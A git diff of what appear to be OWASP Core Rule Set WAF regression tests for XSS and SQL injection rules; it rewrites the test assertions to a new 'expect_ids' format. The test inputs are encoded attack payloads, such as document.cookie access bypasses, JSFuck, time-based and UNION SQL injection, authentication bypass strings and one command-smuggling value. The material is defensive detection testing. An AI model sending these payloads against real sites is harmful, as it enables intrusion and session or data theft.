infoo.bar=&var2=whatever" version: HTTP/1.0 output: - log_contains: id "941340" + log: + expect_ids: [941340] - test_id: 2 desc: "XSS test based on portswigger XSS cheatsheet" stages: @@ -34,4 +35,5 @@ tests: data: "payload=XSS" version: HTTP/1.0 output: - log_contains: id "941340" + log: + expect_ids: [941340] diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941350.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941350.yaml index 703485f18..39834ce0d 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941350.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941350.yaml @@ -18,4 +18,5 @@ tests: User-Agent: "OWASP CRS test agent" version: "HTTP/1.1" output: - log_contains: id "941350" + log: + expect_ids: [941350] diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941360.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941360.yaml index 0064de5d2..b09904023 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941360.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941360.yaml @@ -19,7 +19,8 @@ tests: # Payload represents "alert(1)" in JSFuck encoding version: HTTP/1.1 output: - log_contains: id "941360" + log: + expect_ids: [941360] - test_id: 2 desc: "JSFuck / Hieroglyphy payload obfuscation attack" stages: @@ -36,7 +37,8 @@ tests: # Payload represents "a" in JSFuck / Hieroglyphy encoding version: HTTP/1.1 output: - log_contains: id "941360" + log: + expect_ids: [941360] - test_id: 3 desc: "JSFuck / Hieroglyphy payload obfuscation attack" stages: @@ -53,4 +55,5 @@ tests: # Payload represents "1" in JSFuck / Hieroglyphy encoding version: HTTP/1.1 output: - log_contains: id "941360" + log: + expect_ids: [941360] diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941370.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941370.yaml index 775109d42..36c8ee81b 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941370.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941370.yaml @@ -18,7 +18,8 @@ tests: data: "a=document+%2F%2Afoo%2A%2F+.+++++cookie" version: HTTP/1.1 output: - log_contains: id "941370" + log: + expect_ids: [941370] - test_id: 2 desc: "Bypass using comments in syntax" stages: @@ -34,7 +35,8 @@ tests: data: "a=document%2F%2Afoo%2A%2F.%2F%2Abar%2A%2Fcookie" version: HTTP/1.1 output: - log_contains: id "941370" + log: + expect_ids: [941370] - test_id: 3 desc: "Bypass using JavaScript global variables" stages: @@ -50,7 +52,8 @@ tests: data: "a=window%5B%22alert%22%5D%28window%5B%22document%22%5D%5B%22cookie%22%5D%29" version: HTTP/1.1 output: - log_contains: id "941370" + log: + expect_ids: [941370] - test_id: 4 desc: "Bypass using JavaScript global variables and comments in syntax" stages: @@ -66,7 +69,8 @@ tests: data: "a=self%5B%2F%2Afoo%2A%2F%22alert%22%5D%28self%5B%22document%22%2F%2Abar%2A%2F%5D%5B%22cookie%22%5D%29" version: HTTP/1.1 output: - log_contains: id "941370" + log: + expect_ids: [941370] - test_id: 5 desc: "Bypass using JavaScript global variables and string concatenation" stages: @@ -82,7 +86,8 @@ tests: data: "a=self%5B%2F%2Afoo%2A%2F%22alert%22%5D%28self%5B%22document%22%2F%2Abar%2A%2F%5D%5B%22cookie%22%5D%29" version: HTTP/1.1 output: - log_contains: id "941370" + log: + expect_ids: [941370] - test_id: 6 desc: "Bypass using JavaScript global variables and comments in syntax" stages: @@ -98,7 +103,8 @@ tests: data: "a=self++%2F%2Ajhb%2A%2F++%5B++%2F%2Abar%2A%2F++%22alert%22%5D%28%22xss%22%29" version: HTTP/1.1 output: - log_contains: id "941370" + log: + expect_ids: [941370] - test_id: 7 desc: "Bypass using JavaScript global variables and jQuery globalEval" stages: @@ -114,7 +120,8 @@ tests: data: "a=self%5B%22%24%22%5D%5B%22globalEval%22%5D%28%22alert%281%29%22%29" version: HTTP/1.1 output: - log_contains: id "941370" + log: + expect_ids: [941370] - test_id: 8 desc: "Bypass using JavaScript global variables and hex escape sequence" stages: @@ -130,7 +137,8 @@ tests: data: "a=self%5B%22%5Cx24%22%5D" version: HTTP/1.1 output: - log_contains: id "941370" + log: + expect_ids: [941370] - test_id: 9 desc: "Bypass trying to access document.cookie using alternative syntax like (document)['cookie']" stages: @@ -146,7 +154,8 @@ tests: data: "a=%28document%29%5B%22cookie%22%5D" version: HTTP/1.1 output: - log_contains: id "941370" + log: + expect_ids: [941370] - test_id: 10 desc: "Bypass trying to access document.cookie using alternative syntax and comments like (document/*foo*/)['cookie']" stages: @@ -162,4 +171,5 @@ tests: data: "a=%28document%2F%2Afoo%2A%2F%29%5B%22cookie%22%5D" version: HTTP/1.1 output: - log_contains: id "941370" + log: + expect_ids: [941370] diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941380.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941380.yaml index 7953c58c0..b5aa4b1c6 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941380.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941380.yaml @@ -18,4 +18,5 @@ tests: # /login?user={{constructor.constructor('alert(1)')()}} version: HTTP/1.1 output: - log_contains: id "941380" + log: + expect_ids: [941380] diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941390.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941390.yaml index 02e655dda..2db0965f6 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941390.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941390.yaml @@ -17,7 +17,8 @@ tests: uri: "/get?arg=setInterval%28code%2C%201%29" version: HTTP/1.1 output: - log_contains: id "941390" + log: + expect_ids: [941390] - test_id: 2 desc: "JavaScript method: arg=x\";setTimeout(name, 1)//" stages: @@ -32,7 +33,8 @@ tests: uri: "/get?arg=x%22%3BsetTimeout%28name%2C%201%29%2F%2F" version: HTTP/1.1 output: - log_contains: id "941390" + log: + expect_ids: [941390] - test_id: 3 desc: "JavaScript method eval('2 + 2')" stages: @@ -47,7 +49,8 @@ tests: uri: "/get?arg=eval%28%272%20%2B%202%27%29" version: HTTP/1.1 output: - log_contains: id "941390" + log: + expect_ids: [941390] - test_id: 4 desc: "JavaScript constructor new Function()" stages: @@ -62,7 +65,8 @@ tests: uri: "/get?arg=new%20Function%28%29" version: HTTP/1.1 output: - log_contains: id "941390" + log: + expect_ids: [941390] - test_id: 5 desc: "JavaScript call alert" stages: @@ -77,7 +81,8 @@ tests: uri: "/get?arg=alert%28%29" version: HTTP/1.1 output: - log_contains: id "941390" + log: + expect_ids: [941390] - test_id: 6 desc: "JavaScript call atob" stages: @@ -92,7 +97,8 @@ tests: uri: "/get?arg=atob%28%29" version: HTTP/1.1 output: - log_contains: id "941390" + log: + expect_ids: [941390] - test_id: 7 desc: "JavaScript call btoa" stages: @@ -107,7 +113,8 @@ tests: uri: "/get?arg=btoa%28%29" version: HTTP/1.1 output: - log_contains: id "941390" + log: + expect_ids: [941390] - test_id: 8 desc: "JavaScript call prompt" stages: @@ -122,7 +129,8 @@ tests: uri: "/get?arg=prompt%28%29" version: HTTP/1.1 output: - log_contains: id "941390" + log: + expect_ids: [941390] - test_id: 9 desc: "JavaScript call confirm" stages: @@ -137,4 +145,5 @@ tests: uri: "/get?arg=confirm%28%29" version: HTTP/1.1 output: - log_contains: id "941390" + log: + expect_ids: [941390] diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941400.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941400.yaml index 6650ffb2b..0ded97033 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941400.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941400.yaml @@ -17,7 +17,8 @@ tests: uri: "/get?xss=%5B%5D.sort.call%60%24%7Balert%7D1337%60" version: HTTP/1.1 output: - log_contains: id "941400" + log: + expect_ids: [941400] - test_id: 2 desc: "JavaScript function without parentheses" stages: @@ -32,7 +33,8 @@ tests: uri: "/get?xss=%5B%20%20%5D%20.%20sort%20.%20call%20%60%20%24%7B%20alert%20%7D%201337%20%60" version: HTTP/1.1 output: - log_contains: id "941400" + log: + expect_ids: [941400] - test_id: 3 desc: "JavaScript function without parentheses" stages: @@ -47,7 +49,8 @@ tests: uri: "/get?xss=%5B%20%20%5D%20.%20%2F%2A%2A%2F%20sort%20.%20call%20%60%20%24%7B%20alert%20%7D%201337%20%60" version: HTTP/1.1 output: - log_contains: id "941400" + log: + expect_ids: [941400] - test_id: 4 desc: "JavaScript function without parentheses" stages: @@ -62,7 +65,8 @@ tests: uri: "/get?xss=%5B%5D.map.call%60%24%7Beval%7D%5C%5Cu%7B61%7Dlert%5Cx281337%5Cx29%60" version: HTTP/1.1 output: - log_contains: id "941400" + log: + expect_ids: [941400] - test_id: 5 desc: "JavaScript function without parentheses" stages: @@ -77,7 +81,8 @@ tests: uri: "/get?xss=%5B%201234%20%5D.%20map%20.%20call%60%24%7Beval%7D%2F%2A%20asd%20%2A%2F%5C%5Cu%7B61%7Dlert%5Cx281337%5Cx29%60" version: HTTP/1.1 output: - log_contains: id "941400" + log: + expect_ids: [941400] - test_id: 6 desc: "JavaScript function without parentheses" stages: @@ -92,7 +97,8 @@ tests: uri: "/get?xss=Reflect.apply.call%60%24%7Bnavigation.navigate%7D%24%7Bnavigation%7D%24%7B%5Bname%5D%7D%60" version: HTTP/1.1 output: - log_contains: id "941400" + log: + expect_ids: [941400] - test_id: 7 desc: "Status Page Test - JavaScript minimal test with Reflect.sort.call``" stages: @@ -107,4 +113,5 @@ tests: uri: "/get?test=Reflect.sort.call%60%60" version: HTTP/1.1 output: - log_contains: id "941400" + log: + expect_ids: [941400] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942100.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942100.yaml index 7a8b5e8ca..e7c61638c 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942100.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942100.yaml @@ -19,7 +19,8 @@ tests: data: "var=1234 OR 1=1" version: HTTP/1.0 output: - log_contains: id "942100" + log: + expect_ids: [942100] - test_id: 2 desc: "Simple SQL injection" stages: @@ -35,7 +36,8 @@ tests: data: "var=-1839' or '1'='1" version: HTTP/1.0 output: - log_contains: id "942100" + log: + expect_ids: [942100] - test_id: 3 desc: "Simple SQL injection" stages: @@ -51,7 +53,8 @@ tests: data: "var=-1839\" or \"1\"=\"2" version: HTTP/1.0 output: - log_contains: id "942100" + log: + expect_ids: [942100] - test_id: 4 desc: "Basic SQL injection" stages: @@ -67,7 +70,8 @@ tests: data: "var=2010-01-01'+sleep(20.to_i)+'" version: HTTP/1.0 output: - log_contains: id "942100" + log: + expect_ids: [942100] - test_id: 5 desc: "Simple SQL injection" stages: @@ -83,7 +87,8 @@ tests: data: "var=EmptyValue' and 526=527" version: HTTP/1.0 output: - log_contains: id "942100" + log: + expect_ids: [942100] - test_id: 6 desc: "Simple SQL injection" stages: @@ -99,7 +104,8 @@ tests: data: "var=foo') UNION ALL select NULL --" version: HTTP/1.0 output: - log_contains: id "942100" + log: + expect_ids: [942100] - test_id: 7 desc: "Advanced SQL injection" stages: @@ -115,7 +121,8 @@ tests: data: "var=foo')waitfor%20delay'5%3a0%3a20'--" version: HTTP/1.0 output: - log_contains: id "942100" + log: + expect_ids: [942100] - test_id: 8 desc: "Simple SQL Injection" stages: @@ -131,7 +138,8 @@ tests: data: "var=JKGHUKGDI8TDHLFJH72FZLFJSKFH' and sleep(12) --" version: HTTP/1.0 output: - log_contains: id "942100" + log: + expect_ids: [942100] - test_id: 9 desc: "Simple SQL injection" stages: @@ -147,7 +155,8 @@ tests: data: "var=/path/to/file/unitests.txt') UNION ALL select NULL --" version: HTTP/1.0 output: - log_contains: id "942100" + log: + expect_ids: [942100] - test_id: 10 desc: "Advanced SQL Injection" stages: @@ -163,7 +172,8 @@ tests: data: "1'||(select extractvalue(xmltype('%toyop;" version: HTTP/1.0 output: - log_contains: id "942100" + log: + expect_ids: [942100] - test_id: 11 desc: "Simple function call" stages: @@ -179,7 +189,8 @@ tests: data: "var=sleep(20)" version: HTTP/1.0 output: - log_contains: id "942100" + log: + expect_ids: [942100] - test_id: 12 desc: "Advanced SQL injection" stages: @@ -195,7 +206,8 @@ tests: data: "var=unittests@coreruleset.org\" sleep(10.to_i) \"" version: HTTP/1.0 output: - log_contains: id "942100" + log: + expect_ids: [942100] - test_id: 13 desc: "Advanced injection" stages: @@ -211,7 +223,8 @@ tests: data: "var=\" | type %SystemDrive%\\\\config.ini | \"" version: HTTP/1.0 output: - log_contains: id "942100" + log: + expect_ids: [942100] - test_id: 14 desc: "Advanced SQL injection" stages: @@ -227,4 +240,5 @@ tests: data: "var=\"unittests@coreruleset.org\"')) and (select*from(select(sleep(5)))x) --" version: HTTP/1.0 output: - log_contains: id "942100" + log: + expect_ids: [942100] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942101.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942101.yaml index 7237a3bc7..5af7502c1 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942101.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942101.yaml @@ -18,7 +18,8 @@ tests: uri: "/post/1234%20OR%201=1" version: HTTP/1.0 output: - log_contains: id "942101" + log: + expect_ids: [942101] - test_id: 2 desc: "Basic SQL injection" stages: @@ -33,7 +34,8 @@ tests: uri: "/post/2010-01-01'+sleep(20.to_i)+'" version: HTTP/1.0 output: - log_contains: id "942101" + log: + expect_ids: [942101] - test_id: 3 desc: "Simple SQL injection" stages: @@ -48,7 +50,8 @@ tests: uri: "/post/EmptyValue'%20and%20526=527" version: HTTP/1.0 output: - log_contains: id "942101" + log: + expect_ids: [942101] - test_id: 4 desc: "Advanced SQL injection" stages: @@ -63,7 +66,8 @@ tests: uri: "/post/foo')waitfor%20delay'5%3a0%3a20'--" version: HTTP/1.0 output: - log_contains: id "942101" + log: + expect_ids: [942101] - test_id: 5 desc: "Simple function call" stages: @@ -78,7 +82,8 @@ tests: uri: "/post/sleep(20)" version: HTTP/1.0 output: - log_contains: id "942101" + log: + expect_ids: [942101] - test_id: 6 desc: "Advanced SQL injection" stages: @@ -93,7 +98,8 @@ tests: uri: "/post/unittests@coreruleset.org\"%20sleep(10.to_i)%20\"" version: HTTP/1.0 output: - log_contains: id "942101" + log: + expect_ids: [942101] - test_id: 7 desc: "SQL Injection at the last segment of the path (request_basename detection)" stages: @@ -108,7 +114,8 @@ tests: uri: "/post/foo/24'union+all+select+1,2,3+from+aa" version: HTTP/1.0 output: - log_contains: id "942101" + log: + expect_ids: [942101] - test_id: 8 desc: "SQL Injection inside the path (request_filename detection)" stages: @@ -123,7 +130,8 @@ tests: uri: "/post/foo/24'union+all+select+1,2,3+from+aa/bar" version: HTTP/1.0 output: - log_contains: id "942101" + log: + expect_ids: [942101] - test_id: 9 desc: "SQL Injection inside the path with comment block (request_filename detection)" stages: @@ -138,7 +146,8 @@ tests: uri: "/post/%2A/%2A/2+union+all/bar" version: HTTP/1.0 output: - log_contains: id "942101" + log: + expect_ids: [942101] - test_id: 10 desc: "Negative test with incomplete SQL command inside the path" stages: @@ -153,7 +162,8 @@ tests: uri: "/post/foo/9'union+all/bar" version: HTTP/1.0 output: - no_log_contains: id "942101" + log: + no_expect_ids: [942101] - test_id: 11 desc: "Negative test with complete SQL command inside the path, but without comma" stages: @@ -168,4 +178,5 @@ tests: uri: "/post/foo/24+union+all+select+1,2,3+from+aa/bar" version: HTTP/1.0 output: - no_log_contains: id "942101" + log: + no_expect_ids: [942101] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942120.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942120.yaml index f3a5ec7b7..2fbb65a60 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942120.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942120.yaml @@ -3,6 +3,7 @@ meta: author: "Christian S.J. Peron, Christoph Hansen, Franziska Bühler, azurit" description: None tests: + - test_id: 1 - test_id: 1 desc: "SQL Injection Attack: SQL Operator Detected" stages: @@ -17,7 +18,8 @@ tests: uri: "/get?var=blahblah&var2=LIKE%20NULL" version: HTTP/1.0 output: - log_contains: id "942120" + log: + expect_ids: [942120] - test_id: 2 desc: "SQL Injection Attack: SQL Operator Detected" stages: @@ -33,7 +35,8 @@ tests: data: "pay=RegExp" version: HTTP/1.0 output: - log_contains: id "942120" + log: + expect_ids: [942120] - test_id: 3 desc: "SQL Injection Attack: SQL Operator Detected" stages: @@ -49,7 +52,8 @@ tests: data: ">>" version: HTTP/1.0 output: - log_contains: id "942120" + log: + expect_ids: [942120] - test_id: 4 desc: "SQL Injection Attack: SQL Operator Detected" stages: @@ -65,7 +69,8 @@ tests: data: "pay=%26%26" version: HTTP/1.0 output: - log_contains: id "942120" + log: + expect_ids: [942120] - test_id: 5 desc: "SQL Injection Attack: SQL Operator Detected" stages: @@ -81,7 +86,8 @@ tests: data: "<<" version: HTTP/1.0 output: - log_contains: id "942120" + log: + expect_ids: [942120] - test_id: 6 desc: "SQL Injection Attack: SQL Operator Detected" stages: @@ -97,7 +103,8 @@ tests: data: "%21%3D" version: HTTP/1.0 output: - log_contains: id "942120" + log: + expect_ids: [942120] - test_id: 7 desc: "SQL Injection Attack: SQL Operator Detected" stages: @@ -113,7 +120,8 @@ tests: data: "||" version: HTTP/1.0 output: - log_contains: id "942120" + log: + expect_ids: [942120] - test_id: 8 desc: "SQL Injection Attack: SQL Operator Detected" stages: @@ -129,7 +137,8 @@ tests: data: "XOR" version: HTTP/1.0 output: - log_contains: id "942120" + log: + expect_ids: [942120] - test_id: 9 desc: "SQL Injection Attack: SQL Operator Detected" stages: @@ -145,7 +154,8 @@ tests: data: "pay=%3C%3D" version: HTTP/1.0 output: - log_contains: id "942120" + log: + expect_ids: [942120] - test_id: 10 desc: "SQL Injection Attack: SQL Operator Detected" stages: @@ -161,7 +171,8 @@ tests: data: "IS NULL" version: HTTP/1.0 output: - log_contains: id "942120" + log: + expect_ids: [942120] - test_id: 11 desc: "SQL Injection Attack: SQL Operator Detected" stages: @@ -177,7 +188,8 @@ tests: data: "in (0,1)" version: HTTP/1.0 output: - log_contains: id "942120" + log: + expect_ids: [942120] - test_id: 12 desc: "SQL Injection Attack: SQL Operator Detected" stages: @@ -193,7 +205,8 @@ tests: data: "in (2147483647,-1)" version: HTTP/1.0 output: - log_contains: id "942120" + log: + expect_ids: [942120] - test_id: 13 desc: "SQL Injection Attack: SQL Operator Detected" stages: @@ -209,7 +222,8 @@ tests: data: "pay=%3C%3D%3E" version: HTTP/1.0 output: - log_contains: id "942120" + log: + expect_ids: [942120] - test_id: 14 desc: "SQL Injection Attack: SQL Operator Detected" stages: @@ -225,7 +239,8 @@ tests: data: "regexp" version: HTTP/1.0 output: - log_contains: id "942120" + log: + expect_ids: [942120] - test_id: 15 desc: "SQL Injection Attack: SQL Operator Detected" stages: @@ -241,7 +256,8 @@ tests: data: "RLIKE" version: HTTP/1.0 output: - log_contains: id "942120" + log: + expect_ids: [942120] - test_id: 16 desc: "SQL Injection Attack: SQL Operator Detected" stages: @@ -257,7 +273,8 @@ tests: data: "<>" version: HTTP/1.0 output: - log_contains: id "942120" + log: + expect_ids: [942120] - test_id: 17 desc: "SQL Injection Attack: SQL Operator Detected" stages: @@ -273,7 +290,8 @@ tests: data: "+in+%28++select+anfrage_id+from+erkenntnisse+where+id+is++not++null++%29%0A" version: HTTP/1.0 output: - log_contains: id "942120" + log: + expect_ids: [942120] - test_id: 18 desc: "SQL Injection Attack: SQL Operator Detected" stages: @@ -289,7 +307,8 @@ tests: data: "+IN+%28815914%2C+815913%29%0A" version: HTTP/1.0 output: - log_contains: id "942120" + log: + expect_ids: [942120] - test_id: 19 desc: "SQL Injection Attack: SQL Operator Detected" stages: @@ -305,7 +324,8 @@ tests: data: "+IN+%28815919%2C+815920%2C+815921%2C+815922%2C+815923%2C+815924%2C+815925%2C+815926%2C+815927%2C+815928%2C+815929%2C+815930%2C+815932%2C+815933%2C+815934%2C+815935%2C+815936%2C+815937%2C+815917%2C+815918%29%0A" version: HTTP/1.0 output: - log_contains: id "942120" + log: + expect_ids: [942120] - test_id: 20 desc: "SQL Injection Attack: SQL Operator Detected" stages: @@ -321,7 +341,8 @@ tests: data: "pay= in ( Aa,- Ab-, and Ac)" version: HTTP/1.0 output: - log_contains: id "942120" + log: + expect_ids: [942120] - test_id: 21 desc: "SQL Injection Attack: SQL Operator Detected" stages: @@ -337,7 +358,8 @@ tests: data: "%3E%3D" version: HTTP/1.0 output: - log_contains: id "942120" + log: + expect_ids: [942120] - test_id: 22 desc: "SQL Injection Attack: not between * and " stages: @@ -353,7 +375,8 @@ tests: data: "select%20*%20from%20user%20where%20password_last_changed%20not%20between%20'2021-04-11'%20and%20'2021-04-11'" version: HTTP/1.0 output: - log_contains: id "942120" + log: + expect_ids: [942120] - test_id: 23 desc: "SQL Injection Attack: SQL Operator Detected" stages: @@ -369,7 +392,8 @@ tests: data: "email=z'or%20email%20notnull--" version: HTTP/1.0 output: - log_contains: id "942120" + log: + expect_ids: [942120] - test_id: 24 desc: "SQL Injection Attack: SQL Operator Detected" stages: @@ -385,7 +409,8 @@ tests: data: "email=x'%20or%20username%20like%20totpSecret%20escape%20'x';" version: HTTP/1.0 output: - log_contains: id "942120" + log: + expect_ids: [942120] - test_id: 25 desc: "SQL Injection Attack: SQL Operator Detected" stages: @@ -401,7 +426,8 @@ tests: data: "email=admin%40juice-sh.op'%20and%20email%20ilike%20email--" version: HTTP/1.0 output: - log_contains: id "942120" + log: + expect_ids: [942120] - test_id: 26 desc: "SQL Injection Attack: SQL Operator Detected" stages: @@ -417,7 +443,8 @@ tests: data: "email=admin%40juice-sh.op'%20and%20email%20%3d%20all%20(select%20email)--" version: HTTP/1.0 output: - log_contains: id "942120" + log: + expect_ids: [942120] - test_id: 27 desc: "SQLite collate nocase" stages: @@ -433,7 +460,8 @@ tests: data: "var=user'collate%20nocase--" version: HTTP/1.0 output: - log_contains: id "942120" + log: + expect_ids: [942120] - test_id: 28 desc: "SQLite collate nocase" stages: @@ -449,7 +477,8 @@ tests: data: "var=user'collate%20nocase--" version: HTTP/1.0 output: - log_contains: id "942120" + log: + expect_ids: [942120] - test_id: 29 desc: "SQL collate`nocase`" stages: @@ -465,7 +494,8 @@ tests: data: "var=user'collate%60nocase%60--" version: HTTP/1.0 output: - log_contains: id "942120" + log: + expect_ids: [942120] - test_id: 30 desc: "Invalid SQL collate foo" stages: @@ -481,7 +511,8 @@ tests: data: "var=user'collate%20foo--" version: HTTP/1.0 output: - no_log_contains: id "942120" + log: + no_expect_ids: [942120] - test_id: 31 desc: "Invalid SQL collate foo" stages: @@ -498,7 +529,8 @@ tests: data: "var=user'collate%60utf8mb4_general_ci%60--" version: HTTP/1.0 output: - log_contains: id "942120" + log: + expect_ids: [942120] - test_id: 32 desc: "Collate bypass with character escaping" stages: @@ -515,7 +547,8 @@ tests: data: "var=user'collate%22%5Cutf8mb4_general_ci%22--" version: HTTP/1.0 output: - log_contains: id "942120" + log: + expect_ids: [942120] - test_id: 33 desc: "Collate bypass with postgress string escaping U&" stages: @@ -532,7 +565,8 @@ tests: data: "var=user'collate U%26%22%241%23B%23E%23D%22--" version: HTTP/1.0 output: - log_contains: id "942120" + log: + expect_ids: [942120] - test_id: 34 desc: "Detect auth bypass email=' notnull --" stages: @@ -548,7 +582,8 @@ tests: data: "email=%27%20notnull%20--" version: HTTP/1.0 output: - log_contains: id "942120" + log: + expect_ids: [942120] - test_id: 35 desc: "Test for IJ5N1CXB - unlikely" stages: @@ -564,7 +599,8 @@ tests: data: "email=admin%40juice-sh.op'and%20unlikely%20(id)--" version: HTTP/1.0 output: - log_contains: id "942120" + log: + expect_ids: [942120] - test_id: 36 desc: "Negative test for IJ5N1CXB - unlikely" stages: @@ -580,7 +616,8 @@ tests: data: text=It is highly unlikely this is going to be a false positive version: HTTP/1.0 output: - no_log_contains: id "942120" + log: + no_expect_ids: [942120] - test_id: 37 desc: "Test for HOH7M88Q - likelihood" stages: @@ -597,7 +634,8 @@ tests: email=admin%40juice-sh.op\'%20and(%20likelihood%20(id,.0));' version: HTTP/1.1 output: - log_contains: id "942120" + log: + expect_ids: [942120] - test_id: 38 desc: "Negative test for HOH7M88Q - likelihood" stages: @@ -614,7 +652,8 @@ tests: text=After calculating the likelihood this should not be matched. version: HTTP/1.1 output: - no_log_contains: id "942120" + log: + no_expect_ids: [942120] - test_id: 39 desc: "Detect path-based SQLi attempt" stages: @@ -629,4 +668,5 @@ tests: uri: "/post/catalogue/rest/products/2499999||this.product/reviews" version: HTTP/1.0 output: - log_contains: id "942120" + log: + expect_ids: [942120] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942130.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942130.yaml index 7811cf31f..ce94374b6 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942130.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942130.yaml @@ -18,7 +18,8 @@ tests: data: "var=%221%22%20sSOUNDS%20LIKE%20%22SOUNDS%20LIKE%201&other_var=test" version: HTTP/1.0 output: - no_log_contains: id "942130" + log: + no_expect_ids: [942130] - test_id: 2 desc: "SQL Injection Attack: SQL Tautology" stages: @@ -32,7 +33,8 @@ tests: uri: "/get?a=1=1" version: HTTP/1.1 output: - log_contains: id "942130" + log: + expect_ids: [942130] - test_id: 3 desc: "SQL Injection Attack: SQL Tautology" stages: @@ -46,7 +48,8 @@ tests: uri: "/get?a=11=1" version: HTTP/1.1 output: - no_log_contains: id "942130" + log: + no_expect_ids: [942130] - test_id: 4 desc: "SQL Injection Attack: SQL Tautology" stages: @@ -60,7 +63,8 @@ tests: uri: "/get?a=1=11" version: HTTP/1.1 output: - no_log_contains: id "942130" + log: + no_expect_ids: [942130] - test_id: 5 desc: "SQL Injection Attack: SQL Tautology" stages: @@ -74,7 +78,8 @@ tests: uri: "/get?a=11!=11" version: HTTP/1.1 output: - no_log_contains: id "942130" + log: + no_expect_ids: [942130] - test_id: 6 desc: "SQL Injection Attack: SQL Tautology" stages: @@ -88,7 +93,8 @@ tests: uri: "/get?a=b,1=1" version: HTTP/1.1 output: - log_contains: id "942130" + log: + expect_ids: [942130] - test_id: 7 desc: "SQL Injection Attack: SQL Tautology - like" stages: @@ -103,7 +109,8 @@ tests: data: "a=42%20like%2042" version: HTTP/1.1 output: - log_contains: id "942130" + log: + expect_ids: [942130] - test_id: 8 desc: "SQL Injection Attack: SQL Tautology" stages: @@ -117,7 +124,8 @@ tests: uri: "/get?a=This%20is%20like%20no%20other" version: HTTP/1.1 output: - no_log_contains: id "942130" + log: + no_expect_ids: [942130] - test_id: 9 desc: "SQL Injection Attack: SQL Tautology using MySQL NULL-safe operator <=>" stages: @@ -131,7 +139,8 @@ tests: uri: "/get?a=42<=>42" version: HTTP/1.1 output: - log_contains: id "942130" + log: + expect_ids: [942130] - test_id: 10 desc: "SQL Injection Attack: SQL Tautology using glob" stages: @@ -145,4 +154,5 @@ tests: uri: "/get?user=admin%40juice-sh.op'%20and%20password%20glob%20password;" version: HTTP/1.1 output: - log_contains: id "942130" + log: + expect_ids: [942130] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942131.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942131.yaml index 7d5c7de4d..37712c37d 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942131.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942131.yaml @@ -17,7 +17,8 @@ tests: uri: "/get?a=11!=1" version: HTTP/1.1 output: - log_contains: id "942131" + log: + expect_ids: [942131] - test_id: 2 desc: "SQL Injection Attack: SQL Tautology" stages: @@ -31,7 +32,8 @@ tests: uri: "/get?a=1!=11" version: HTTP/1.1 output: - log_contains: id "942131" + log: + expect_ids: [942131] - test_id: 3 desc: "SQL Injection Attack: SQL Tautology" stages: @@ -45,7 +47,8 @@ tests: uri: "/get?a=11!=11" version: HTTP/1.1 output: - no_log_contains: id "942131" + log: + no_expect_ids: [942131] - test_id: 4 desc: "SQL Injection Attack: SQL Tautology" stages: @@ -59,7 +62,8 @@ tests: uri: "/get?a=1%20is%20not%202" version: HTTP/1.1 output: - log_contains: id "942131" + log: + expect_ids: [942131] - test_id: 5 desc: "SQL Injection Attack: SQL Tautology negative" stages: @@ -73,7 +77,8 @@ tests: uri: "/get?a=1%20is%20not%201" version: HTTP/1.1 output: - no_log_contains: id "942131" + log: + no_expect_ids: [942131] - test_id: 6 desc: "SQL Injection Attack: SQL Tautology" stages: @@ -88,7 +93,8 @@ tests: data: "a='1' not regexp '2'" version: HTTP/1.1 output: - log_contains: id 